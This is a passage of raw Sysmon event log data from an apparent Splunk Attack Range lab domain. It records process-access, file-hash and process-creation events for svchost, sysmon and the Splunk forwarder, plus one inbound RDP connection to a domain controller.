STEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.151{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.151{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.151{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F29E-60EB-3779-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.151{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29E-60EB-3779-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.151{0C1E0330-F29E-60EB-3779-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:27.992{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=150FB7050802D0A16C59CA061A538063,SHA256=CC7D00FA3BBF31E36A03602B280817017367C875AB3BC2E4BF2841B3A91F786F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.948{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8881C08752F4786A7B5536D70F47F4AF,SHA256=0A5D2B394D24352D2F81E1576F69584C71DD761C998FD36588A4072B253DBD07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.948{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=149572522252F789C8A05686B78EAEF8,SHA256=09D532E82DCD3AC50CA3FC30AF4B6FB2D640C4B1DBC60EAA8B32DC8B7417899C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.666{0C1E0330-F29F-60EB-3979-00000000D001}37723708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001045756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:19.660{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse194.156.88.187chabka-hosting.com62841-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001045755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:27.011{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A8C83559D34EDEE4F290BF4559D0B23,SHA256=52C207B6150F385A99C76A68862C2D412C73961F596CAC52F8A7F6F6DA6DC989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:27.011{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6576C650EC8B80BCE4E848626A770FA,SHA256=CC4CF15AD9D9D60D9E13F7B16827893414849D1AB9DC89AFF3B6E2378D8A898B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29F-60EB-3979-00000000D001}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F29F-60EB-3979-00000000D001}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29F-60EB-3979-00000000D001}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.495{0C1E0330-F29F-60EB-3979-00000000D001}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.682{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=513511066EF03E91250AD8361308769A,SHA256=9F9BD0658EBF9F7152DBB1F0FA20496A60CD72D6C45767CFC1309FB645BF219D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2A0-60EB-3A79-00000000D001}2864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 